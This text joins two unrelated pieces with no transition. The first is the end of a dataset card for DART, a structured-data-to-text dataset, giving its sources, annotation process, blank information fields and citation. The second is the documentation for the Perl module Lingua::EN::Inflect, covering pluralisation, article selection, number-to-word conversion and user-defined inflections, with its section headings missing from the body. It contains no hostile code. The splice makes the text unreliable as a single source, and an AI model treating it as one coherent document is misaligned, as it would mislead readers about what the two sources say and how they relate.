DART is constructed using multiple complementary methods: (1) human annotation on open-domain Wikipedia tables from WikiTableQuestions (Pasupat and Liang, 2015) and WikiSQL (Zhong et al., 2017), (2) automatic conversion of questions in WikiSQL to declarative sentences, and (3) incorporation of existing datasets including WebNLG 2017 (Gardent et al., 2017a,b; Shimorina and Gardent, 2018) and Cleaned E2E (Novikova et al., 2017b; Dušek et al., 2018, 2019)
Annotation process
The two stage annotation process for constructing tripleset sentence pairs is based on a tree-structured ontology of each table. First, internal skilled annotators denote the parent column for each column header. Then, a larger number of annotators provide a sentential description of an automatically-chosen subset of table cells in a row.
Who are the annotators?
[More Information Needed]
Personal and Sensitive Information
[More Information Needed]
Considerations for Using the Data
Social Impact of Dataset
[More Information Needed]
Discussion of Biases
[More Information Needed]
Other Known Limitations
[More Information Needed]
Additional Information
Dataset Curators
[More Information Needed]
Licensing Information
Under MIT license (see here)
Citation Information
@article{radev2020dart,
title={DART: Open-Domain Structured Data Record to Text Generation},
author={Dragomir Radev and Rui Zhang and Amrit Rau and Abhinand Sivaprasad and Chiachun Hsieh and Nazneen Fatema Rajani and Xiangru Tang and Aadit Vyas and Neha Verma and Pranav Krishna and Yangxiaokang Liu and Nadia Irwanto and Jessica Pan and Faiaz Rahman and Ahmad Zaidi and Murori Mutuma and Yasin Tarabar and Ankit Gupta and Tao Yu and Yi Chern Tan and Xi Victoria Lin and Caiming Xiong and Richard Socher},
journal={arXiv preprint arXiv:2007.02871},
year={2020}
}
|
NAME
VERSION
SYNOPSIS
DESCRIPTION
FORMING PLURALS
OTHER VERB FORMS
PROVIDING INDEFINITE ARTICLES
INFLECTING ORDINALS
CONVERTING NUMBERS TO WORDS
CONVERTING LISTS OF WORDS TO PHRASES
INTERPOLATING INFLECTIONS IN STRINGS
MODERN VS CLASSICAL INFLECTIONS
USER-DEFINED INFLECTIONS
DIAGNOSTICS
OTHER ISSUES
NOTE
AUTHOR
BUGS AND IRRITATIONS
COPYRIGHT
NAME
Lingua::EN::Inflect - Convert singular to plural. Select "a" or "an".
VERSION
This document describes version 1.904 of Lingua::EN::Inflect
SYNOPSIS
use Lingua::EN::Inflect qw ( PL PL_N PL_V PL_ADJ NO NUM
PL_eq PL_N_eq PL_V_eq PL_ADJ_eq
A AN
PART_PRES
ORD NUMWORDS
WORDLIST
inflect classical
def_noun def_verb def_adj def_a def_an );
# UNCONDITIONALLY FORM THE PLURAL
print "The plural of ", $word, " is ", PL($word), "\n";
# CONDITIONALLY FORM THE PLURAL
print "I saw $cat_count ", PL("cat",$cat_count), "\n";
# FORM PLURALS FOR SPECIFIC PARTS OF SPEECH
print PL_N("I",$N1), PL_V("saw",$N1),
PL_ADJ("my",$N2), PL_N("saw",$N2), "\n";
# DEAL WITH "0/1/N" -> "no/1/N" TRANSLATION:
print "There ", PL_V("was",$errors), NO(" error",$errors), "\n";
# USE DEFAULT COUNTS:
print NUM($N1,""), PL("I"), PL_V(" saw"), NUM($N2), PL_N(" saw");
print "There ", NUM($errors,''), PL_V("was"), NO(" error"), "\n";
# COMPARE TWO WORDS "NUMBER-INSENSITIVELY":
print "same\n" if PL_eq($word1, $word2);
print "same noun\n" if PL_N_eq($word1, $word2);
print "same verb\n" if PL_V_eq($word1, $word2);
print "same adj.\n" if PL_ADJ_eq($word1, $word2);
# ADD CORRECT "a" OR "an" FOR A GIVEN WORD:
print "Did you want ", A($thing), " or ", AN($idea), "\n";
# CONVERT NUMERALS INTO ORDINALS (i.e. 1->1st, 2->2nd, 3->3rd, etc.)
print "It was", ORD($position), " from the left\n";
# CONVERT NUMERALS TO WORDS (i.e. 1->"one", 101->"one hundred and one", etc.)
# IN A SCALAR CONTEXT: GET BACK A SINGLE STRING...
$words = NUMWORDS(1234); # "one thousand, two hundred and thirty-four"
$words = NUMWORDS(ORD(1234)); # "one thousand, two hundred and thirty-fourth"
# IN A LIST CONTEXT: GET BACK A LIST OF STRINGS, ONE FOR EACH "CHUNK"...
@words = NUMWORDS(1234); # ("one thousand","two hundred and thirty-four")
# OPTIONAL PARAMETERS CHANGE TRANSLATION:
$words = NUMWORDS(12345, group=>1);
# "one, two, three, four, five"
$words = NUMWORDS(12345, group=>2);
# "twelve, thirty-four, five"
$words = NUMWORDS(12345, group=>3);
# "one twenty-three, forty-five"
$words = NUMWORDS(1234, 'and'=>'');
# "one thousand, two hundred thirty-four"
$words = NUMWORDS(1234, 'and'=>', plus');
# "one thousand, two hundred, plus thirty-four"
$words = NUMWORDS(555_1202, group=>1, zero=>'oh');
# "five, five, five, one, two, oh, two"
$words = NUMWORDS(555_1202, group=>1, one=>'unity');
# "five, five, five, unity, two, zero, two"
$words = NUMWORDS(123.456, group=>1, decimal=>'mark');
# "one two three mark four five six"
# LITERAL STYLE ONLY NAMES NUMBERS LESS THAN A CERTAIN THRESHOLD...
$words = NUMWORDS( 9, threshold=>10); # "nine"
$words = NUMWORDS( 10, threshold=>10); # "ten"
$words = NUMWORDS( 11, threshold=>10); # "11"
$words = NUMWORDS(1000, threshold=>10); # "1,000"
# JOIN WORDS INTO A LIST:
$list = WORDLIST("apple", "banana", "carrot");
# "apple, banana, and carrot"
$list = WORDLIST("apple", "banana");
# "apple and banana"
$list = WORDLIST("apple", "banana", "carrot", {final_sep=>""});
# "apple, banana and carrot"
# REQUIRE "CLASSICAL" PLURALS (EG: "focus"->"foci", "cherub"->"cherubim")
classical; # USE ALL CLASSICAL PLURALS
classical 1; # USE ALL CLASSICAL PLURALS
classical 0; # USE ALL MODERN PLURALS (DEFAULT)
classical 'zero'; # "no error" INSTEAD OF "no errors"
classical zero=>1; # "no error" INSTEAD OF "no errors"
classical zero=>0; # "no errors" INSTEAD OF "no error"
classical 'herd'; # "2 buffalo" INSTEAD OF "2 buffalos"
classical herd=>1; # "2 buffalo" INSTEAD OF "2 buffalos"
classical herd=>0; # "2 buffalos" INSTEAD OF "2 buffalo"
classical 'persons'; # "2 chairpersons" INSTEAD OF "2 chairpeople"
classical persons=>1; # "2 chairpersons" INSTEAD OF "2 chairpeople"
classical persons=>0; # "2 chairpeople" INSTEAD OF "2 chairpersons"
classical 'ancient'; # "2 formulae" INSTEAD OF "2 formulas"
classical ancient=>1; # "2 formulae" INSTEAD OF "2 formulas"
classical ancient=>0; # "2 formulas" INSTEAD OF "2 formulae"
# INTERPOLATE "PL()", "PL_N()", "PL_V()", "PL_ADJ()", A()", "AN()"
# "NUM()" AND "ORD()" WITHIN STRINGS:
print inflect("The plural of $word is PL($word)\n");
print inflect("I saw $cat_count PL(cat,$cat_count)\n");
print inflect("PL(I,$N1) PL_V(saw,$N1) PL(a,$N2) PL_N(saw,$N2)\n");
print inflect("NUM($N1,)PL(I) PL_V(saw) NUM($N2,)PL(a) PL_N(saw)\n");
print inflect("I saw NUM($cat_count) PL(cat)\n");
print inflect("There PL_V(was,$errors) NO(error,$errors)\n");
print inflect("There NUM($errors,)PL_V(was) NO(error)\n");
print inflect("Did you want A($thing) or AN($idea)\n");
print inflect("It was ORD($position) from the left\n");
# ADD USER-DEFINED INFLECTIONS (OVERRIDING INBUILT RULES):
def_noun "VAX" => "VAXen"; # SINGULAR => PLURAL
def_verb "will" => "shall", # 1ST PERSON SINGULAR => PLURAL
"will" => "will", # 2ND PERSON SINGULAR => PLURAL
"will" => "will"; # 3RD PERSON SINGULAR => PLURAL
def_adj "hir" => "their"; # SINGULAR => PLURAL
def_a "h"; # "AY HALWAYS SEZ 'HAITCH'!"
def_an "horrendous.*"; # "AN HORRENDOUS AFFECTATION"
DESCRIPTION
[ Note: This module is strictly in maintenance mode now. Take a look at the newer Lingua::EN::Inflexion module, which offers a cleaner and more convenient interface, has many more features (including plural->singular inflexions), and is also much better tested. If you have existing code that relies on Lingua::EN::Inflect, see the section of the documentation entitled "CONVERTING FROM LINGUA::EN::INFLECT". ]
The exportable subroutines of Lingua::EN::Inflect provide plural inflections, "a"/"an" selection for English words, and manipulation of numbers as words
Plural forms of all nouns, most verbs, and some adjectives are provided. Where appropriate, "classical" variants (for example: "brother" -> "brethren", "dogma" -> "dogmata", etc.) are also provided.
Pronunciation-based "a"/"an" selection is provided for all English words, and most initialisms.
It is also possible to inflect numerals (1,2,3) to ordinals (1st, 2nd, 3rd) and to English words ("one", "two", "three").
In generating these inflections, Lingua::EN::Inflect follows the Oxford English Dictionary and the guidelines in Fowler's Modern English Usage, preferring the former where the two disagree.
The module is built around standard British spelling, but is designed to cope with common American variants as well. Slang, jargon, and other English dialects are not explicitly catered for.
Where two or more inflected forms exist for a single word (typically a "classical" form and a "modern" form), Lingua::EN::Inflect prefers the more common form (typically the "modern" one), unless "classical" processing has been specified (see "MODERN VS CLASSICAL INFLECTIONS").
All of the PL_... plural inflection subroutines take the word to be inflected as their first argument and return the corresponding inflection. Note that all such subroutines expect the singular form of the word. The results of passing a plural form are undefined (and unlikely to be correct).
The PL_... subroutines also take an optional second argument, which indicates the grammatical "number" of the word (or of another word with which the word being inflected must agree). If the "number" argument is supplied and is not 1 (or "one" or "a", or some other adjective that implies the singular), the plural form of the word is returned. If the "number" argument does indicate singularity, the (uninflected) word itself is returned. If the number argument is omitted, the plural form is returned unconditionally.
The various subroutines are:
PL_N($;$)
The exportable subroutine PL_N() takes a singular English noun or pronoun and returns its plural. Pronouns in the nominative ("I" -> "we") and accusative ("me" -> "us") cases are handled, as are possessive pronouns ("mine" -> "ours").
PL_V($;$)
The exportable subroutine PL_V() takes the singular form of a conjugated verb (that is, one which is already in the correct "person" and "mood") and returns the corresponding plural conjugation.
PL_ADJ($;$)
The exportable subroutine PL_ADJ() takes the singular form of certain types of adjectives and returns the corresponding plural form. Adjectives that are correctly handled include: "numerical" adjectives ("a" -> "some"), demonstrative adjectives ("this" -> "these", "that" -> "those"), and possessives ("my" -> "our", "cat's" -> "cats'", "child's" -> "childrens'", etc.)
PL($;$)
The exportable subroutine PL() takes a singular English noun, pronoun, verb, or adjective and returns its plural form. Where a word has more than one inflection depending on its part of speech (for example, the noun "thought" inflects to "thoughts", the verb "thought" to "thought"), the (singular) noun sense is preferred to the (singular) verb sense.
Hence PL("knife") will return "knives" ("knife" having been treated as a singular noun), whereas PL("knifes") will return "knife" ("knifes" having been treated as a 3rd person singular verb).
The inherent ambiguity of such cases suggests that, where the part of speech is known, PL_N, PL_V, and PL_ADJ should be used in preference to PL.
Note that all these subroutines ignore any whitespace surrounding the word being inflected, but preserve that whitespace when the result is returned. For example, PL(" cat ") returns " cats ".
The PL_... subroutines return only the inflected word, not the count that was used to inflect it. Thus, in order to produce "I saw 3 ducks", it is necessary to use:
print "I saw $N ", PL_N($animal,$N), "\n";
Since the usual purpose of producing a plural is to make it agree with a preceding count, Lingua::EN::Inflect provides an exportable subroutine (NO($;$)) which, given a word and a(n optional) count, returns the count followed by the correctly inflected word. Hence the previous example can be rewritten:
print "I saw ", NO($animal,$N), "\n";
In addition, if the count is zero (or some other term which implies zero, such as "zero", "nil", etc.) the count is replaced by the word "no". Hence, if $N had the value zero, the previous example would print the somewhat more elegant:
I saw no animals
rather than:
I saw 0 animals
Note that the name of the subroutine is a pun: the subroutine returns either a number (a No.) or a "no", in front of the inflected word.
The NO() subroutine takes an optional third argument: a hash of named options that configure its behaviour.
The 'words_below' option informs NO() what other numbers (i.e. apart from zero) it should convert to words. For example:
for my $count (0..12) {
print NO('cat', $count, {words_below => 10}), "\n";
}
would print:
no cats
one cat
two cats
three cats
four cats
five cats
six cats
seven cats
eight cats
nine cats
10 cats
11 cats
12 cats
The 'comma' and 'comma_every' options determine whether or not the numbers produced by NO() have commas in them. That is:
2001 space odysseys
versus:
2,001 space odysseys
Normally, numbers are produced without commas, but if 'comma' or 'comma_every' is specified, then commas are added as requested.
The 'comma' option specifies which character to use as a comma. It defaults to ',', but may be set to anything convenient:
print NO('Euro', $amount, {comma=>'.'});
# prints: 1.000.000 Euros
The 'comma_every' option specifies how many characters between commas. It defaults to 3, but may be set to any positive number:
print NO('Euro', $amount, {comma_every=>4});
# prints: 100,0000 Euros
Note that you can set both options at once, if you wish:
print NO('Euro', $amount, {comma_every=>2, comma=>'_'});
# prints: 1_00_00_00 Euros
In some contexts, the need to supply an explicit count to the various PL_... subroutines makes for tiresome repetition. For example:
print PL_ADJ("This",$errors), PL_N(" error",$errors),
PL_V(" was",$errors), " fatal.\n";
Lingua::EN::Inflect therefore provides an exportable subroutine (NUM($;$)) that may be used to set a persistent "default number" value. If such a value is set, it is subsequently used whenever an optional second "number" argument is omitted. The default value thus set can subsequently be removed by calling NUM() with no arguments. Hence we could rewrite the previous example:
NUM($errors);
print PL_ADJ("This"), PL_N(" error"), PL_V(" was"), "fatal.\n";
NUM();
Normally, NUM() returns its first argument, so that it may also be "inlined" in contexts like:
print NUM($errors), PL_N(" error"), PL_V(" was"), " detected.\n"
print PL_ADJ("This"), PL_N(" error"), PL_V(" was"), "fatal.\n"
if $severity > 1;
However, in certain contexts (see "INTERPOLATING INFLECTIONS IN STRINGS") it is preferable that NUM() return an empty string. Hence NUM() provides an optional second argument. If that argument is supplied (that is, if it is defined) and evaluates to false, NUM returns an empty string instead of its first argument. For example:
print NUM($errors,0), NO("error"), PL_V(" was"), " detected.\n";
print PL_ADJ("This"), PL_N(" error"), PL_V(" was"), "fatal.\n"
if $severity > 1;
Lingua::EN::Inflect also provides a solution to the problem of comparing words of differing plurality through the exportable subroutines PL_eq($$), PL_N_eq($$), PL_V_eq($$), and PL_ADJ_eq($$). Each of these subroutines takes two strings, and compares them using the corresponding plural-inflection subroutine (PL(), PL_N(), PL_V(), and PL_ADJ() respectively).
The comparison returns true if:
the strings are eq-equal, or
one string is eq-equal to a plural form of the other, or
the strings are two different plural forms of the one word.
Hence all of the following return true:
PL_eq("index","index") # RETURNS "eq"
PL_eq("index","indexes") # RETURNS "s:p"
PL_eq("index","indices") # RETURNS "s:p"
PL_eq("indexes","index") # RETURNS "p:s"
PL_eq("indices","index") # RETURNS "p:s"
PL_eq("indices","indexes") # RETURNS "p:p"
PL_eq("indexes","indices") # RETURNS "p:p"
PL_eq("indices","indices") # RETURNS "eq"
As indicated by the comments in the previous example, the actual value returned by the various PL_eq subroutines encodes which of the three equality rules succeeded: "eq" is returned if the strings were identical, "s:p" if the strings were singular and plural respectively, "p:s" for plural and singular, and "p:p" for two distinct plurals. Inequality is indicated by returning an empty string.
It should be noted that two distinct singular words which happen to take the same plural form are not considered equal, nor are cases where one (singular) word's plural is the other (plural) word's singular. Hence all of the following return false:
PL_eq("base","basis") # ALTHOUGH BOTH -> "bases"
PL_eq("syrinx","syringe") # ALTHOUGH BOTH -> "syringes"
PL_eq("she","he") # ALTHOUGH BOTH -> "they"
PL_eq("opus","operas") # ALTHOUGH "opus" -> "opera" -> "operas"
PL_eq("taxi","taxes") # ALTHOUGH "taxi" -> "taxis" -> "taxes"
Note too that, although the comparison is "number-insensitive", it is not case-insensitive (that is, PL_eq("time","Times") returns false). To obtain both number and case insensitivity, prefix both arguments with lc (that is, PL_eq(lc "time", lc "Times") returns true).
Lingua::EN::Inflect also provides the PART_PRES subroutine, which can take a 3rd person singular verb and correctly inflect it to its present participle:
PART_PRES("runs") # "running"
PART_PRES("loves") # "loving"
PART_PRES("eats") # "eating"
PART_PRES("bats") # "batting"
PART_PRES("spies") # "spying"
Lingua::EN::Inflect provides two exportable subroutines (A($;$) and AN($;$)) which will correctly prepend the appropriate indefinite article to a word, depending on its pronunciation. For example:
A("cat") # -> "a cat"
AN("cat") # -> "a cat"
A("euphemism") # -> "a euphemism"
A("Euler number") # -> "an Euler number"
A("hour") # -> "an hour"
A("houri") # -> "a houri"
The two subroutines are identical in function and may be used interchangeably. The only reason that two versions are provided is to enhance the readability of code such as:
print "That is ", AN($errortype), " error\n;
print "That is ", A($fataltype), " fatal error\n;
Note that in both cases the actual article provided depends only on the pronunciation of the first argument, not on the name of the subroutine.
A() and AN() will ignore any indefinite article that already exists at the start of the string. Thus:
@half_arked = (
"a elephant",
"a giraffe",
"an ewe",
"a orangutan",
);
print A($_), "\n" for @half_arked;
# prints:
# an elephant
# a giraffe
# a ewe
# an orangutan
A() and AN() both take an optional second argument. As with the PL_... subroutines, this second argument is a "number" specifier. If its value is 1 (or some other value implying singularity), A() and AN() insert "a" or "an" as appropriate. If the number specifier implies plurality, (A() and AN() insert the actual second argument instead. For example:
A("cat",1) # -> "a cat"
A("cat",2) # -> "2 cat"
A("cat","one") # -> "one cat"
A("cat","no") # -> "no cat"
Note that, as implied by the previous examples, A() and AN() both assume that their job is merely to provide the correct qualifier for a word (that is: "a", "an", or the specified count). In other words, they assume that the word they are given has already been correctly inflected for plurality. Hence, if $N has the value 2, then:
print A("cat",$N);
prints "2 cat", instead of "2 cats". The correct approach is to use:
print A(PL("cat",$N),$N);
or, better still:
print NO("cat",$N);
Note too that, like the various PL_... subroutines, whenever A() and AN() are called with only one argument they are subject to the effects of any preceding call to NUM(). Hence, another possible solution is:
NUM($N);
print A(PL("cat"));
"Initialisms" (sometimes inaccurately called "acronyms") are terms which have been formed from the initial letters of words in a phrase (for example, "NATO", "NBL", "S.O.S.", "SCUBA", etc.)
Such terms present a particular challenge when selecting between "a" and "an", since they are sometimes pronounced as if they were a single word ("nay-tow", "sku-ba") and sometimes as a series of letter names ("en-eff-ell", "ess-oh-ess").
A() and AN() cope with this dichotomy using a series of inbuilt rules, which may be summarized as:
If the word starts with a single letter, followed by a period or dash (for example, "R.I.P.", "C.O.D.", "e-mail", "X-ray", "T-square"), then choose the appropriate article for the sound of the first letter ("an R.I.P.", "a C.O.D.", "an e-mail", "an X-ray", "a T-square").
If the first two letters of the word are capitals, consonants, and do not appear at the start of any known English word, (for example, "LCD", "XML", "YWCA"), then once again choose "a" or "an" depending on the sound of the first letter ("an LCD", "an XML", "a YWCA").
Otherwise, assume the string is a capitalized word or a pronounceable initialism (for example, "LED", "OPEC", "FAQ", "UNESCO"), and therefore takes "a" or "an" according to the (apparent) pronunciation of the entire word ("a LED", "an OPEC", "a FAQ", "a UNESCO").
Note that rules 1 and 3 together imply that the presence or absence of punctuation may change the selection of indefinite article for a particular initialism (for example, "a FAQ" but "an F.A.Q.").
Words beginning in the letter 'H' present another type of difficulty when selecting a suitable indefinite article. In a few such words (for example, "hour", "honour", "heir") the 'H' is not voiced at all, and so such words inflect with "an". The remaining cases ("voiced H's") may be divided into two categories: "hard H's" (such as "hangman", "holograph", "hat", etc.) and "soft H's" (such as "hysterical", "horrendous", "holy", etc.)
Hard H's always take "a" as their indefinite article, and soft H's normally do so as well. But some English speakers prefer "an" for soft H's (although the practice is now generally considered an affectation, rather than a legitimate grammatical alternative).
At present, the A() and AN() subroutines ignore soft H's and use "a" for any voiced 'H'. The author would, however, welcome feedback on this decision (envisaging a possible future "soft H" mode).
Occasionally it is useful to present an integer value as an ordinal rather than as a numeral. For example:
Enter password (1st attempt): ********
Enter password (2nd attempt): *********
Enter password (3rd attempt): *********
No 4th attempt. Access denied.
To this end, Lingua::EN::Inflect provides the ORD() subroutine. ORD() takes a single argument and forms its ordinal equivalent. If the argument isn't a numerical integer, it just adds "-th".
The exportable subroutine NUMWORDS takes a number (cardinal or ordinal) and returns an English representation of that number. In a scalar context a string is returned. Hence:
use Lingua::EN::Inflect qw( NUMWORDS );
$words = NUMWORDS(1234567);
puts the string:
"one million, two hundred and thirty-four thousand, five hundred and sixty-seven"
into $words.
In a list context each comma-separated chunk is returned as a separate element. Hence:
@words = NUMWORDS(1234567);
puts the list:
("one million",
"two hundred and thirty-four thousand",
"five hundred and sixty-seven")
into @words.
Note that this also means that:
print NUMWORDS(1234567);
will (mis)print:
one milliontwo hundred and thirty-four thousandfive hundred and sixty-seven
To get readable output, make sure the call is in scalar context:
print scalar NUMWORDS(1234567);
Non-digits (apart from an optional leading plus or minus sign, any decimal points, and ordinal suffixes -- see below) are silently ignored, so the following all produce identical results:
NUMWORDS(5551202);
NUMWORDS(5_551_202);
NUMWORDS("5,551,202");
NUMWORDS("555-1202");
That last case is a little awkward since it's almost certainly a phone number, and "five million, five hundred and fifty-one thousand, two hundred and two" probably isn't what's wanted.
To overcome this, NUMWORDS() takes an optional named argument, 'group', which changes how numbers are translated. The argument must be a positive integer less than four, which indicated how the digits of the number are to be grouped. If the argument is 1, then each digit is translated separately. If the argument is 2, pairs of digits (starting from the left) are grouped together. If the argument is 3, triples of numbers (again, from the left) are grouped. Hence:
NUMWORDS("555-1202", group=>1)
returns "five, five, five, one, two, zero, two", whilst:
NUMWORDS("555-1202", group=>2)
returns "fifty-five, fifty-one, twenty, two", and:
NUMWORDS("555-1202", group=>3)
returns "five fifty-five, one twenty, two".
Phone numbers are often written in words as "five..five..five..one..two..zero..two", which is also easy to achieve:
join '..', NUMWORDS("555-1202", group=>1)
NUMWORDS also handles decimal fractions. Hence:
NUMWORDS("1.2345")
returns "one point two three four five" in a scalar context and ("one","point","two","three","four","five")) in an array context. Exponent form ("1.234e56") is not yet handled.
Multiple decimal points are only translated in one of the "grouping" modes. Hence:
NUMWORDS(101.202.303)
returns "one hundred and one point two zero two three zero three", whereas:
NUMWORDS(101.202.303, group=>1)
returns "one zero one point two zero two point three zero three".
The digit '0' is unusual in that in may be translated to English as "zero", "oh", or "nought". To cater for this diversity, NUMWORDS may be passed a named argument, 'zero', which may be set to the desired translation of '0'. For example:
print join "..", NUMWORDS("555-1202", group=>3, zero=>'oh')
prints "five..five..five..one..two..oh..two". By default, zero is rendered as "zero".
Likewise, the digit '1' may be rendered as "one" or "a/an" (or very occasionally other variants), depending on the context. So there is a 'one' argument as well:
print NUMWORDS($_, one=>'a solitary', zero=>'no more'),
PL(" bottle of beer on the wall\n", $_)
for (3,2,1,0);
# prints:
# three bottles of beer on the wall
# two bottles of beer on the wall
# a solitary bottle of beer on the wall
# no more bottles of beer on the wall
Care is needed if the word "a/an" is to be used as a 'one' value. Unless the next word is known in advance, it's almost always necessary to use the A function as well:
print A( NUMWORDS(1, one=>'a') . " $_\n")
for qw(cat aardvark ewe hour);
# prints:
# a cat
# an aardvark
# a ewe
# an hour
Another major regional variation in number translation is the use of "and" in certain contexts. The named argument 'and' allows the programmer to specify how "and" should be handled. Hence:
print scalar NUMWORDS("765", 'and'=>'')
prints "seven hundred sixty-five", instead of "seven hundred and sixty-five". By default, the "and" is included.
The translation of the decimal point is also subject to variation (with "point", "dot", and "decimal" being the favorites). The named argument 'decimal' allows the programmer to specify how the decimal point should be rendered. Hence:
print scalar NUMWORDS("666.124.64.101", group=>3, decimal=>'dot')
prints "six sixty-six, dot, one twenty-four, dot, sixty-four, dot, one zero one" By default, the decimal point is rendered as "point".
NUMWORDS also handles the ordinal forms of numbers. So:
print scalar NUMWORDS('1st');
print scalar NUMWORDS('3rd');
print scalar NUMWORDS('202nd');
print scalar NUMWORDS('1000000th');
print:
first
third
two hundred and twenty-second
one millionth
Two common idioms in this regard are:
print scalar NUMWORDS(ORD($number));
and:
print scalar ORD(NUMWORDS($number));
These are identical in effect, except when $number contains a decimal:
$number = 99.09;
print scalar NUMWORDS(ORD($number)); # ninety-ninth point zero nine
print scalar ORD(NUMWORDS($number)); # ninety-nine point zero ninth
Use whichever you feel is most appropriate.
When creating a list of words, commas are used between adjacent items, except if the items contain commas, in which case semicolons are used. But if there are fewer than three items, the commas/semicolons are omitted entirely. The final item also has a conjunction (usually "and" or "or") before it. And although it's technically incorrect (and sometimes misleading), some people prefer to omit the comma before that final conjunction, even when there are more than two items.
That's complicated enough to warrant its own subroutine: WORDLIST(). This subroutine expects a list of words, possibly with one or more hash references containing options. It returns a string that joins the list together in the normal English usage. For example:
print "You chose ", WORDLIST(@selected_items), "\n";
# You chose barley soup, roast beef, and Yorkshire pudding
print "You chose ", WORDLIST(@selected_items, {final_sep=>""}), "\n";
# You chose barley soup, roast beef and Yorkshire pudding
print "Please chose ", WORDLIST(@side_orders, {conj=>"or"}), "\n";
# Please chose salad, vegetables, or ice-cream
The available options are:
Option name Specifies Default value
conj Final conjunction "and"
sep Inter-item separator ","
last_sep Final separator value of 'sep' option
By far the commonest use of the inflection subroutines is to produce message strings for various purposes. For example:
print NUM($errors), PL_N(" error"), PL_V(" was"), " detected.\n";
print PL_ADJ("This"), PL_N(" error"), PL_V(" was"), "fatal.\n"
if $severity > 1;
Unfortunately the need to separate each subroutine call detracts significantly from the readability of the resulting code. To ameliorate this problem, Lingua::EN::Inflect provides an exportable string-interpolating subroutine (inflect($)), which recognizes calls to the various inflection subroutines within a string and interpolates them appropriately.
Using inflect the previous example could be rewritten:
print inflect "NUM($errors) PL_N(error) PL_V(was) detected.\n";
print inflect "PL_ADJ(This) PL_N(error) PL_V(was) fatal.\n"
if $severity > 1;
Note that inflect also correctly handles calls to the NUM() subroutine (whether interpolated or antecedent). The inflect() subroutine has a related extra feature, in that it automatically cancels any "default number" value before it returns its interpolated string. This means that calls to NUM() which are embedded in an inflect()-interpolated string do not "escape" and interfere with subsequent inflections.
Certain words, mainly of Latin or Ancient Greek origin, can form plurals either using the standard English "-s" suffix, or with their original Latin or Greek inflections. For example:
PL("stigma") # -> "stigmas" or "stigmata"
PL("torus") # -> "toruses" or "tori"
PL("index") # -> "indexes" or "indices"
PL("millennium") # -> "millenniums" or "millennia"
PL("ganglion") # -> "ganglions" or "ganglia"
PL("octopus") # -> "octopuses" or "octopodes"
Lingua::EN::Inflect caters to such words by providing an "alternate state" of inflection known as "classical mode". By default, words are inflected using their contemporary English plurals, but if classical mode is invoked, the more traditional plural forms are returned instead.
The exportable subroutine classical() controls this feature. If classical() is called with no arguments, it unconditionally invokes classical mode. If it is called with a single argument, it turns all classical inflects on or off (depending on whether the argument is true or false). If called with two or more arguments, those arguments specify which aspects of classical behaviour are to be used.
Thus:
classical; # SWITCH ON CLASSICAL MODE
print PL("formula"); # -> "formulae"
classical 0; # SWITCH OFF CLASSICAL MODE
print PL("formula"); # -> "formulas"
classical $cmode; # CLASSICAL MODE IFF $cmode
print PL("formula"); # -> "formulae" (IF $cmode)
# -> "formulas" (OTHERWISE)
classical herd=>1; # SWITCH ON CLASSICAL MODE FOR "HERD" NOUNS
print PL("wilderbeest"); # -> "wilderbeest"
classical names=>1; # SWITCH ON CLASSICAL MODE FOR NAMES
print PL("sally"); # -> "sallies"
print PL("Sally"); # -> "Sallys"
Note however that classical() has no effect on the inflection of words which are now fully assimilated. Hence:
PL("forum") # ALWAYS -> "forums"
PL("criterion") # ALWAYS -> "criteria"
LEI assumes that a capitalized word is a person's name. So it forms the plural according to the rules for names (which is that you don't inflect, you just add -s or -es). You can choose to turn that behaviour off (it's on by default, even when the module isn't in classical mode) by calling classical(names=>0).
Lingua::EN::Inflect provides five exportable subroutines which allow the programmer to override the module's behaviour for specific cases:
def_noun($$)
The def_noun subroutine takes a pair of string arguments: the singular and plural forms of the noun being specified. The singular form specifies a pattern to be interpolated (as m/^(?:$first_arg)$/i). Any noun matching this pattern is then replaced by the string in the second argument. The second argument specifies a string which is interpolated after the match succeeds, and is then used as the plural form. For example:
def_noun 'cow' => 'kine';
def_noun '(.+i)o' => '$1i';
def_noun 'spam(mer)?' => '\\$\\%\\@#\\$\\@#!!';
Note that both arguments should usually be specified in single quotes, so that they are not interpolated when they are specified, but later (when words are compared to them). As indicated by the last example, care also needs to be taken with certain characters in the second argument, to ensure that they are not unintentionally interpolated during comparison.
The second argument string may also specify a second variant of the plural form, to be used when "classical" plurals have been requested. The beginning of the second variant is marked by a '|' character:
def_noun 'cow' => 'cows|kine';
def_noun '(.+i)o' => '$1os|$1i';
def_noun 'spam(mer)?' => '\\$\\%\\@#\\$\\@#!!|varmints';
If no classical variant is given, the specified plural form is used in both normal and "classical" modes.
If the second argument is undef instead of a string, then the current user definition for the first argument is removed, and the standard plural inflection(s) restored.
Note that in all cases, later plural definitions for a particular singular form replace earlier definitions of the same form. For example:
# FIRST, HIDE THE MODERN FORM....
def_noun 'aviatrix' => 'aviatrices';
# LATER, HIDE THE CLASSICAL FORM...
def_noun 'aviatrix' => 'aviatrixes';
# FINALLY, RESTORE THE DEFAULT BEHAVIOUR...
def_noun 'aviatrix' => undef;
Special care is also required when defining general patterns and associated specific exceptions: put the more specific cases after the general pattern. For example:
def_noun '(.+)us' => '$1i'; # EVERY "-us" TO "-i"
def_noun 'bus' => 'buses'; # EXCEPT FOR "bus"
This "try-most-recently-defined-first" approach to matching user-defined words is also used by
def_verb,def_aanddef_an.
def_verb($$$$$$)
The def_verb subroutine takes three pairs of string arguments (that is, six arguments in total), specifying the singular and plural forms of the three "persons" of the verb. As with def_noun, the singular forms are specifications of run-time-interpolated patterns, whilst the plural forms are specifications of (up to two) run-time-interpolated strings:
def_verb 'am' => 'are',
'are' => 'are|art',
'is' => 'are';
def_verb 'have' => 'have',
'have' => 'have',
'ha(s|th)' => 'have';
Note that, as with def_noun, modern/classical variants of plurals may be separately specified, subsequent definitions replace previous ones, and undef'ed plural forms revert to the standard behaviour.
def_adj($$)
The def_adj subroutine takes a pair of string arguments, which specify the singular and plural forms of the adjective being defined. As with def_noun and def_verb, the singular forms are specifications of run-time-interpolated patterns, whilst the plural forms are specifications of (up to two) run-time-interpolated strings:
def_adj 'this' => 'these',
def_adj 'red' => 'red|gules',
As previously, modern/classical variants of plurals may be separately specified, subsequent definitions replace previous ones, and undef'ed plural forms revert to the standard behaviour.
def_a($) and def_an($)
The def_a and def_an subroutines each take a single argument, which specifies a pattern. If a word passed to A() or AN() matches this pattern, it will be prefixed (unconditionally) with the corresponding indefinite article. For example:
def_a 'error';
def_a 'in.+';
def_an 'mistake';
def_an 'error';
As with the other def_... subroutines, such redefinitions are sequential in effect so that, after the above example, "error" will be inflected with "an".
